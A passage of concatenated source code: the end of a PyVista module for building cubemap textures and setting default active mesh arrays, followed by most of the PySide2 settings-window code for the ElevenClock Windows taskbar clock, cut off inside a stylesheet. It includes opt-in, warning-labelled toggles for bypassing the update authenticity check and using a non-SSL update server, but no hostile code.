Prefix may be empty, and extension will default to ``'.jpg'``
For example, if you have 6 images with the skybox2 prefix:
- ``'skybox2-negx.jpg'``
- ``'skybox2-negy.jpg'``
- ``'skybox2-negz.jpg'``
- ``'skybox2-posx.jpg'``
- ``'skybox2-posy.jpg'``
- ``'skybox2-posz.jpg'``
Parameters
----------
path : str, optional
Directory containing the cubemap images.
prefix : str, optional
Prefix to the filename.
ext : str, optional
The filename extension. For example ``'.jpg'``.
Returns
-------
pyvista.Texture
Texture with cubemap.
Examples
--------
Load a skybox given a directory, prefix, and file extension.
>>> import pyvista
>>> skybox = pyvista.cubemap('my_directory', 'skybox', '.jpeg') # doctest:+SKIP
"""
sets = ['posx', 'negx', 'posy', 'negy', 'posz', 'negz']
image_paths = [os.path.join(path, f'{prefix}{suffix}{ext}') for suffix in sets]
return _cubemap_from_paths(image_paths)
def cubemap_from_filenames(image_paths):
"""Construct a cubemap from 6 images.
Images must be in the following order:
- Positive X
- Negative X
- Positive Y
- Negative Y
- Positive Z
- Negative Z
Parameters
----------
image_paths : list
Paths of the individual cubemap images.
Returns
-------
pyvista.Texture
Texture with cubemap.
Examples
--------
Load a skybox given a list of image paths.
>>> image_paths = [
... '/home/user/_px.jpg',
... '/home/user/_nx.jpg',
... '/home/user/_py.jpg',
... '/home/user/_ny.jpg',
... '/home/user/_pz.jpg',
... '/home/user/_nz.jpg',
... ]
>>> skybox = pyvista.cubemap(image_paths=image_paths) # doctest:+SKIP
"""
if len(image_paths) != 6:
raise ValueError("image_paths must contain 6 paths")
return _cubemap_from_paths(image_paths)
def _cubemap_from_paths(image_paths):
"""Construct a cubemap from image paths."""
for image_path in image_paths:
if not os.path.isfile(image_path):
file_str = '\n'.join(image_paths)
raise FileNotFoundError(
f'Unable to locate {image_path}\n'
'Expected to find the following files:\n'
f'{file_str}'
)
texture = pyvista.Texture()
texture.SetMipmap(True)
texture.SetInterpolate(True)
texture.cube_map = True # Must be set prior to setting images
# add each image to the cubemap
for i, fn in enumerate(image_paths):
image = pyvista.read(fn)
flip = _vtk.vtkImageFlip()
flip.SetInputDataObject(image)
flip.SetFilteredAxis(1) # flip y axis
flip.Update()
texture.SetInputDataObject(i, flip.GetOutput())
return texture
def set_default_active_vectors(mesh: 'pyvista.DataSet') -> None:
"""Set a default vectors array on mesh, if not already set.
If an active vector already exists, no changes are made.
If an active vectors does not exist, it checks for possibly cell
or point arrays with shape ``(n, 3)``. If only one exists, then
it is set as the active vectors. Otherwise, an error is raised.
Parameters
----------
mesh : pyvista.DataSet
Dataset to set default active vectors.
Raises
------
MissingDataError
If no vector-like arrays exist.
AmbiguousDataError
If more than one vector-like arrays exist.
"""
if mesh.active_vectors_name is not None:
return
point_data = mesh.point_data
cell_data = mesh.cell_data
possible_vectors_point = [
name for name, value in point_data.items() if value.ndim == 2 and value.shape[1] == 3
]
possible_vectors_cell = [
name for name, value in cell_data.items() if value.ndim == 2 and value.shape[1] == 3
]
possible_vectors = possible_vectors_point + possible_vectors_cell
n_possible_vectors = len(possible_vectors)
if n_possible_vectors == 1:
if len(possible_vectors_point) == 1:
preference = 'point'
else:
preference = 'cell'
mesh.set_active_vectors(possible_vectors[0], preference=preference)
elif n_possible_vectors < 1:
raise MissingDataError("No vector-like data available.")
elif n_possible_vectors > 1:
raise AmbiguousDataError(
"Multiple vector-like data available\n"
f"cell data: {possible_vectors_cell}.\n"
f"point data: {possible_vectors_point}.\n"
"Set one as active using DataSet.set_active_vectors(name, preference=type)"
)
def set_default_active_scalars(mesh: 'pyvista.DataSet') -> None:
"""Set a default scalars array on mesh, if not already set.
If an active scalars already exists, no changes are made.
If an active scalars does not exist, it checks for point or cell
arrays. If only one exists, then it is set as the active scalars.
Otherwise, an error is raised.
Parameters
----------
mesh : pyvista.DataSet
Dataset to set default active scalars.
Raises
------
MissingDataError
If no arrays exist.
AmbiguousDataError
If more than one array exists.
"""
if mesh.active_scalars_name is not None:
return
point_data = mesh.point_data
cell_data = mesh.cell_data
possible_scalars_point = point_data.keys()
possible_scalars_cell = cell_data.keys()
possible_scalars = possible_scalars_point + possible_scalars_cell
n_possible_scalars = len(possible_scalars)
if n_possible_scalars == 1:
if len(possible_scalars_point) == 1:
preference = 'point'
else:
preference = 'cell'
mesh.set_active_scalars(possible_scalars[0], preference=preference)
elif n_possible_scalars < 1:
raise MissingDataError("No data available.")
elif n_possible_scalars > 1:
raise AmbiguousDataError(
"Multiple data available\n"
f"cell data: {possible_scalars_cell}.\n"
f"point data: {possible_scalars_point}.\n"
"Set one as active using DataSet.set_active_scalars(name, preference=type)"
)
|
settings.py
|
import platform
import subprocess
import os
import sys
import locale
import time
from PySide2 import QtGui
import psutil
from PySide2.QtGui import *
from PySide2.QtCore import *
from PySide2.QtWidgets import *
import globals
from languages import *
from tools import *
from tools import _
from FramelessWindow import QFramelessWindow
class SettingsWindow(QFramelessWindow):
def __init__(self):
super().__init__()
self.scrollArea = QScrollArea()
self.vlayout = QVBoxLayout()
self.vlayout.setContentsMargins(0, 0, 0, 0)
self.vlayout.setMargin(0)
self.vlayout.setSpacing(0)
layout = QVBoxLayout()
self.updateSize = True
self.scrollArea.setWidgetResizable(True)
self.setObjectName("backgroundWindow")
self.settingsWidget = QWidget()
self.settingsWidget.setObjectName("background")
self.setWindowIcon(QIcon(getPath("icon.ico")))
layout.addSpacing(10)
title = QLabel(_("ElevenClock Settings"))
title.setObjectName("title")
if lang == lang_zh_TW or lang == lang_zh_CN:
title.setStyleSheet("font-size: 25pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
title.setStyleSheet("font-size: 25pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
layout.addWidget(title)
layout.setSpacing(0)
layout.setContentsMargins(0, 0, 0, 0)
layout.setMargin(2)
layout.addSpacing(10)
self.resize(900, 600)
layout.addSpacing(20)
self.scrollArea.setFrameShape(QFrame.NoFrame)
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
else:
self.iconMode = "black"
self.generalSettingsTitle = QIconLabel(_("General Settings:"), getPath(f"settings_{self.iconMode}.png"))
layout.addWidget(self.generalSettingsTitle)
self.updateButton = QSettingsButton(_("<b>Update to the latest version!</b>"), _("Install update"))
self.updateButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.updateButton.clicked.connect(lambda: KillableThread(target=globals.updateIfPossible, args=((True,))).start())
self.updateButton.hide()
layout.addWidget(self.updateButton)
self.selectedLanguage = QSettingsComboBox(_("ElevenClock's language")+" (Language)", _("Change")) #The non-translated (Language) string is there to know what the language option is if you accidentaly change the language
self.selectedLanguage.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
try:
self.selectedLanguage.setItems(list(languageReference.values()), list(languageReference.keys()).index(langName))
except Exception as e:
report(e)
self.selectedLanguage.setItems(list(languageReference.values()), 0)
def changeLang(text):
keys = list(languageReference.keys())
values = list(languageReference.values())
for i in range(len(values)):
if(text == values[i]):
setSettingsValue("PreferredLanguage", str(keys[i]), r=False)
self.selectedLanguage.showRestartButton()
def restartElevenClockByLangChange():
subprocess.run(str("start /B \"\" \""+sys.executable)+"\" --settings", shell=True)
globals.app.quit()
self.selectedLanguage.restartButton.clicked.connect(restartElevenClockByLangChange)
self.selectedLanguage.textChanged.connect(changeLang)
layout.addWidget(self.selectedLanguage)
self.enableUpdates = QSettingsCheckBox(_("Automatically check for updates"))
self.enableUpdates.setChecked(not getSettings("DisableAutoCheckForUpdates"))
self.enableUpdates.stateChanged.connect(lambda i: setSettings("DisableAutoCheckForUpdates", not bool(i), r = False))
layout.addWidget(self.enableUpdates)
self.installUpdates = QSettingsCheckBox(_("Automatically install available updates"))
self.installUpdates.setChecked(not getSettings("DisableAutoInstallUpdates"))
self.installUpdates.stateChanged.connect(lambda i: setSettings("DisableAutoInstallUpdates", not bool(i), r = False))
layout.addWidget(self.installUpdates)
self.silentUpdates = QSettingsCheckBox(_("Enable really silent updates"))
self.silentUpdates.setChecked(getSettings("EnableSilentUpdates"))
self.silentUpdates.stateChanged.connect(lambda i: setSettings("EnableSilentUpdates", bool(i), r = False))
layout.addWidget(self.silentUpdates)
self.bypassCNAMECheck = QSettingsCheckBox(_("Bypass update provider authenticity check (NOT RECOMMENDED, AT YOUR OWN RISK)"))
self.bypassCNAMECheck.setChecked(getSettings("BypassDomainAuthCheck"))
self.bypassCNAMECheck.stateChanged.connect(lambda i: setSettings("BypassDomainAuthCheck", bool(i), r = False))
layout.addWidget(self.bypassCNAMECheck)
self.enableSystemTray = QSettingsCheckBox(_("Show ElevenClock on system tray"))
self.enableSystemTray.setChecked(not getSettings("DisableSystemTray"))
self.enableSystemTray.stateChanged.connect(lambda i: setSettings("DisableSystemTray", not bool(i)))
layout.addWidget(self.enableSystemTray)
self.startupButton = QSettingsButton(_("Change startup behaviour"), _("Change"))
self.startupButton.clicked.connect(lambda: os.startfile("ms-settings:startupapps"))
layout.addWidget(self.startupButton)
layout.addSpacing(10)
self.clockSettingsTitle = QIconLabel(_("Clock Settings:"), getPath(f"clock_{self.iconMode}.png"))
layout.addWidget(self.clockSettingsTitle)
self.legacyHideOnFullScreen = QSettingsCheckBox(_("Hide the clock in fullscreen mode"))
self.legacyHideOnFullScreen.setChecked(not getSettings("DisableHideOnFullScreen"))
self.legacyHideOnFullScreen.stateChanged.connect(lambda i: setSettings("DisableHideOnFullScreen", not bool(i)))
layout.addWidget(self.legacyHideOnFullScreen)
self.legacyRDPHide = QSettingsCheckBox(_("Hide the clock when RDP Client or Citrix Workspace are running").replace("RDP", "RDP, VMWare Horizon"))
self.legacyRDPHide.setChecked(getSettings("EnableHideOnRDP"))
self.legacyRDPHide.stateChanged.connect(lambda i: setSettings("EnableHideOnRDP", bool(i)))
layout.addWidget(self.legacyRDPHide)
self.forceClockToShow = QSettingsCheckBox(_("Show the clock when the taskbar is set to hide automatically"))
self.forceClockToShow.setChecked(getSettings("DisableHideWithTaskbar"))
self.forceClockToShow.stateChanged.connect(lambda i: setSettings("DisableHideWithTaskbar", bool(i)))
layout.addWidget(self.forceClockToShow)
self.clockAtBottom = QSettingsCheckBox(_("Force the clock to be at the bottom of the screen"))
self.clockAtBottom.setChecked(getSettings("ForceOnBottom"))
self.clockAtBottom.stateChanged.connect(lambda i: setSettings("ForceOnBottom", bool(i)))
layout.addWidget(self.clockAtBottom)
self.clockAtLeft = QSettingsCheckBox(_("Show the clock at the left of the screen"))
self.clockAtLeft.setChecked(getSettings("ClockOnTheLeft"))
self.clockAtLeft.stateChanged.connect(lambda i: setSettings("ClockOnTheLeft", bool(i)))
layout.addWidget(self.clockAtLeft)
self.primaryScreen = QSettingsCheckBox(_("Show the clock on the primary screen (Useful if clock is set on the left)"))
self.primaryScreen.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.primaryScreen.setChecked(getSettings("ForceClockOnFirstMonitor"))
self.primaryScreen.stateChanged.connect(lambda i: setSettings("ForceClockOnFirstMonitor", bool(i)))
layout.addWidget(self.primaryScreen)
layout.addSpacing(10)
self.clockAppearanceTitle = QIconLabel(_("Clock Appearance:"), getPath(f"appearance_{self.iconMode}.png"))
layout.addWidget(self.clockAppearanceTitle)
self.blackText = QSettingsCheckBox(_("Force the clock to have black text"))
self.blackText.setChecked(getSettings("ForceLightTheme"))
self.blackText.stateChanged.connect(lambda i: setSettings("ForceLightTheme", bool(i)))
#layout.addWidget(self.blackText)
self.lightText = QSettingsCheckBox(_("Force the clock to have white text"))
self.lightText.setChecked(getSettings("ForceDarkTheme"))
#layout.addWidget(self.lightText)
self.fontPrefs = QSettingsFontBoxComboBox(_("Use a custom font"))
self.fontPrefs.setChecked(getSettings("UseCustomFont"))
if self.fontPrefs.isChecked():
customFont = getSettingsValue("UseCustomFont")
if customFont:
self.fontPrefs.combobox.setCurrentText(customFont)
self.fontPrefs.combobox.lineEdit().setFont(QFont(customFont))
else:
if lang == lang_ko:
self.fontPrefs.combobox.setCurrentText("Malgun Gothic")
elif lang == lang_zh_TW or lang == lang_zh_CN:
self.fontPrefs.combobox.setCurrentText("Microsoft JhengHei UI")
else:
self.fontPrefs.combobox.setCurrentText("Segoe UI Variable Display")
self.fontPrefs.stateChanged.connect(lambda i: setSettings("UseCustomFont", bool(i)))
self.fontPrefs.valueChanged.connect(lambda v: setSettingsValue("UseCustomFont", v))
layout.addWidget(self.fontPrefs)
self.fontSize = QSettingsSizeBoxComboBox(_("Use a custom font size"))
self.fontSize.setChecked(getSettings("UseCustomFontSize"))
self.fontSize.loadItems()
if self.fontSize.isChecked():
customFontSize = getSettingsValue("UseCustomFontSize")
if customFontSize:
self.fontSize.combobox.setCurrentText(customFontSize)
else:
self.fontSize.combobox.setCurrentText("9")
self.fontSize.stateChanged.connect(lambda i: setSettings("UseCustomFontSize", bool(i)))
self.fontSize.valueChanged.connect(lambda v: setSettingsValue("UseCustomFontSize", v))
layout.addWidget(self.fontSize)
self.fontColor = QSettingsSizeBoxColorDialog(_("Use a custom font color"))
self.fontColor.setChecked(getSettings("UseCustomFontColor"))
if self.fontColor.isChecked():
self.fontColor.button.setStyleSheet(f"color: rgb({getSettingsValue('UseCustomFontColor')})")
self.fontColor.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.fontColor.stateChanged.connect(lambda i: setSettings("UseCustomFontColor", bool(i)))
self.fontColor.valueChanged.connect(lambda v: setSettingsValue("UseCustomFontColor", v))
layout.addWidget(self.fontColor)
#self.centerText = QSettingsCheckBox(_("Align the clock text to the center"))
#self.centerText.setChecked(getSettings("CenterAlignment"))
#self.centerText.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
#self.centerText.stateChanged.connect(lambda i: setSettings("CenterAlignment", bool(i)))
#layout.addWidget(self.centerText)
layout.addSpacing(10)
self.dateTimeTitle = QIconLabel(_("Date & Time Settings:"), getPath(f"datetime_{self.iconMode}.png"))
layout.addWidget(self.dateTimeTitle)
self.showTime = QSettingsCheckBox(_("Show time on the clock"))
self.showTime.setChecked(not getSettings("DisableTime"))
self.showTime.stateChanged.connect(lambda i: setSettings("DisableTime", not bool(i), r = False))
layout.addWidget(self.showTime)
self.showSeconds = QSettingsCheckBox(_("Show seconds on the clock"))
self.showSeconds.setChecked(getSettings("EnableSeconds"))
self.showSeconds.stateChanged.connect(lambda i: setSettings("EnableSeconds", bool(i), r = False))
layout.addWidget(self.showSeconds)
self.showDate = QSettingsCheckBox(_("Show date on the clock"))
self.showDate.setChecked(not getSettings("DisableDate"))
self.showDate.stateChanged.connect(lambda i: setSettings("DisableDate", not bool(i), r = False))
layout.addWidget(self.showDate)
self.showWeekCount = QSettingsCheckBox(_("Show week number on the clock"))
self.showWeekCount.setChecked(getSettings("EnableWeekNumber"))
self.showWeekCount.stateChanged.connect(lambda i: setSettings("EnableWeekNumber", bool(i), r = False))
layout.addWidget(self.showWeekCount)
self.showWeekday = QSettingsCheckBox(_("Show weekday on the clock"))
self.showWeekday.setChecked(getSettings("EnableWeekDay"))
self.showWeekday.stateChanged.connect(lambda i: setSettings("EnableWeekDay", bool(i)))
layout.addWidget(self.showWeekday)
self.RegionButton = QSettingsButton(_("Change date and time format (Regional settings)"), _("Regional settings"))
self.RegionButton.clicked.connect(lambda: os.startfile("intl.cpl"))
layout.addWidget(self.RegionButton)
layout.addSpacing(10)
self.experimentalTitle = QIconLabel(_("Fixes and other experimental features: (Use ONLY if something is not working)"), getPath(f"experiment_{self.iconMode}.png"))
layout.addWidget(self.experimentalTitle)
self.newFullScreenHide = QSettingsCheckBox(_("Enable hide when multi-monitor fullscreen apps are running"))
self.newFullScreenHide.setChecked(getSettings("NewFullScreenMethod"))
self.newFullScreenHide.stateChanged.connect(lambda i: setSettings("NewFullScreenMethod", bool(i)))
layout.addWidget(self.newFullScreenHide)
self.fixDash = QSettingsCheckBox(_("Fix the hyphen/dash showing over the month"))
self.fixDash.setChecked(getSettings("EnableHyphenFix"))
self.fixDash.stateChanged.connect(lambda i: setSettings("EnableHyphenFix", bool(i)))
layout.addWidget(self.fixDash)
self.fixSSL = QSettingsCheckBox(_("Alternative non-SSL update server (This might help with SSL errors)"))
self.fixSSL.setChecked(getSettings("AlternativeUpdateServerProvider"))
self.fixSSL.stateChanged.connect(lambda i: setSettings("AlternativeUpdateServerProvider", bool(i)))
layout.addWidget(self.fixSSL)
self.win32alignment = QSettingsCheckBox(_("Alternative clock alignment (may not work)"))
self.win32alignment.setChecked(getSettings("EnableWin32API"))
self.win32alignment.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.win32alignment.stateChanged.connect(lambda i: setSettings("EnableWin32API", bool(i)))
layout.addWidget(self.win32alignment)
layout.addSpacing(10)
self.languageSettingsTitle = QIconLabel(_("About the language pack:"), getPath(f"lang_{self.iconMode}.png"))
layout.addWidget(self.languageSettingsTitle)
self.PackInfoButton = QSettingsButton(_("Translated to English by martinet101"), "")
self.PackInfoButton.button.hide()
self.PackInfoButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.PackInfoButton)
self.openTranslateButton = QSettingsButton(_("Translate ElevenClock to your language"), _("Get started"))
self.openTranslateButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/blob/main/TRANSLATION.md"))
layout.addWidget(self.openTranslateButton)
layout.addSpacing(10)
self.aboutTitle = QIconLabel(_("About ElevenClock version {0}:").format(versionName), getPath(f"about_{self.iconMode}.png"))
layout.addWidget(self.aboutTitle)
self.WebPageButton = QSettingsButton(_("View ElevenClock's homepage"), _("Open"))
self.WebPageButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/"))
self.WebPageButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.WebPageButton)
self.IssueButton = QSettingsButton(_("Report an issue/request a feature"), _("Report"))
self.IssueButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/issues/new/choose"))
self.IssueButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.IssueButton)
self.CofeeButton = QSettingsButton(_("Support the dev: Give me a coffee☕"), _("Open page"))
self.CofeeButton.clicked.connect(lambda: os.startfile("https://ko-fi.com/martinet101"))
self.CofeeButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.CofeeButton)
self.PichonButton = QSettingsButton(_("Icons by Icons8"), _("Webpage"))
self.PichonButton.clicked.connect(lambda: os.startfile("https://icons8.com/"))
self.PichonButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.PichonButton)
self.QtButton = QSettingsButton(_("About Qt6 (PySide6)").replace("Qt6", "Qt5").replace("PySide6", "PySide2"), _("About"))
self.QtButton.clicked.connect(lambda: QMessageBox.aboutQt(self, "ElevenClock - About Qt"))
self.QtButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.QtButton)
self.closeButton = QSettingsButton(_("Close settings"), _("Close"))
self.closeButton.clicked.connect(lambda: self.hide())
layout.addWidget(self.closeButton)
layout.addSpacing(10)
self.debbuggingTitle = QIconLabel(_("Debbugging information:"), getPath(f"bug_{self.iconMode}.png"))
layout.addWidget(self.debbuggingTitle)
self.logButton = QSettingsButton(_("Open ElevenClock's log"), _("Open"))
self.logButton.clicked.connect(lambda: self.showDebugInfo())
self.logButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.logButton)
try:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {str(int(platform.release())+1) if int(platform.version().split('.')[-1])>=22000 else platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
except Exception as e:
report(e)
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
self.hiddenButton.button.setVisible(False)
layout.addWidget(self.hiddenButton)
layout.addSpacing(15)
self.settingsWidget.setLayout(layout)
self.scrollArea.setWidget(self.settingsWidget)
self.scrollArea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.scrollArea.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.titlebar = QTitleBarWidget(self)
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.titlebar.setStyleSheet(f"#ControlWidget{{border-top-left-radius: {self.getPx(6)}px;border-top-right-radius: {self.getPx(6)}px;}}#closeButton{{border-top-right-radius: {self.getPx(6)}px;}}")
self.vlayout.addWidget(self.titlebar)
self.vlayout.addWidget(self.scrollArea)
self.setWindowTitle(_("ElevenClock Settings"))
self.applyStyleSheet()
self.setMinimumWidth(400)
self.updateCheckBoxesStatus()
w = QWidget()
w.setObjectName("borderBackground")
w.setLayout(self.vlayout)
self.setCentralWidget(w)
self.setMouseTracking(True)
self.resize(900, 600)
self.installEventFilter(self)
def updateCheckBoxesStatus(self):
# General settings section
if not self.enableUpdates.isChecked(): # Check if check for updates enabled
for checkbox in [self.installUpdates, self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Automatically check for updates")))
checkbox.setEnabled(False)
else:
for checkbox in [self.installUpdates, self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip("")
checkbox.setEnabled(True)
if not self.installUpdates.isChecked(): # Check if install updates enabled
for checkbox in [self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Automatically install available updates")))
checkbox.setEnabled(False)
else:
for checkbox in [self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip("")
checkbox.setEnabled(True)
# Clock settings section
if not self.clockAtLeft.isChecked(): # Check if clock is on the left
self.primaryScreen.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show the clock at the left of the screen")))
self.primaryScreen.setChecked(False)
self.primaryScreen.setEnabled(False)
else:
self.primaryScreen.setToolTip("")
self.primaryScreen.setEnabled(True)
# Clock appearance
if self.blackText.isChecked(): # Check if light mode is enabled
self.lightText.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Force the clock to have black text")))
self.lightText.setChecked(False)
self.lightText.setEnabled(False)
else:
self.lightText.setToolTip("")
self.lightText.setEnabled(True)
if self.lightText.isChecked(): # Check if dark mode is enabled
self.blackText.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Force the clock to have white text")))
self.blackText.setChecked(False)
self.blackText.setEnabled(False)
else:
self.blackText.setToolTip("")
self.blackText.setEnabled(True)
# Date & time settings
if not self.showTime.isChecked(): # Check if time is shown
self.showSeconds.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show time on the clock")))
self.showSeconds.setEnabled(False)
else:
self.showSeconds.setToolTip("")
self.showSeconds.setEnabled(True)
if not self.showDate.isChecked(): # Check if date is shown
self.showWeekCount.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show date on the clock")))
self.showWeekCount.setEnabled(False)
else:
self.showWeekCount.setToolTip("")
self.showWeekCount.setEnabled(True)
def applyStyleSheet(self):
colors = ['215,226,228', '160,174,183', '101,116,134', '81,92,107', '69,78,94', '41,47,64', '15,18,36', '239,105,80']
string = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Accent", "AccentPalette", b'\xe9\xd8\xf1\x00\xcb\xb7\xde\x00\x96}\xbd\x00\x82g\xb0\x00gN\x97\x00H4s\x00#\x13K\x00\x88\x17\x98\x00')
i = 0
acc = False
for color in string.split(b"\x00"):
add = True
try:
if len(color) == 3:
colors[i] = f"{color[0]},{color[1]},{color[2]}"
elif len(color) == 0:
acc = True
add = False
elif len(color) == 2 and acc:
acc = False
colors[i] = f"0,{color[0]},{color[1]}"
else:
pass
except IndexError:
pass
finally:
if add:
i += 1
self.titlebar.setFixedHeight(self.getPx(32))
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.experimentalTitle.setIcon(getPath(f"experiment_{self.iconMode}.png"))
self.PichonButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.QtButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.closeButton.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.startupButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.RegionButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.WebPageButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.logButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.CofeeButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.openTranslateButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.titlebar.closeButton.setIconSize(QSize(self.getPx(14), self.getPx(14)))
self.titlebar.closeButton.setIcon(QIcon(getPath(f"cross_{self.iconMode}.png")))
self.titlebar.closeButton.setFixedHeight(self.getPx(32))
self.titlebar.closeButton.setFixedWidth(self.getPx(46))
self.titlebar.maximizeButton.setFixedHeight(self.getPx(32))
self.titlebar.maximizeButton.setIconSize(QSize(self.getPx(14), self.getPx(14)))
self.titlebar.maximizeButton.setIcon(QIcon(getPath(f"maximize_{self.iconMode}.png")))
self.titlebar.maximizeButton.setFixedWidth(self.getPx(46))
self.titlebar.minimizeButton.setFixedHeight(self.getPx(32))
self.titlebar.minimizeButton.setIconSize(QSize(self.getPx(12), self.getPx(12)))
self.titlebar.minimizeButton.setIcon(QIcon(getPath(f"minimize_{self.iconMode}.png")))
self.titlebar.minimizeButton.setFixedWidth(self.getPx(46))
self.setStyleSheet(f"""
#backgroundWindow {{
background-color: rgba({colors[3]}, 1);
}}
#titlebarButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#titlebarButton:hover {{
border-radius: 0px;
background-color: rgba({colors[3]}, 1);
}}
#closeButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#closeButton:hover {{
border-radius: 0px;
background-color: rgba(196, 43, 28, 1);
}}
QToolTip {{
border: {self.getPx(1)}px solid #222222;
padding: {self.getPx(4)}px;
border-radius: {self.getPx(6)}px;
background-color: #262626;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(60, 60, 60);
padding: {self.getPx(2)}px;
outline: 0px;
color: white;
background: #262626;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(60, 60, 60);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(255, 255, 255, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QColorDialog {{
background-color: transparent;
border: none;
}}
QLineEdit {{
background-color: #1d1d1d;
padding: 5px;
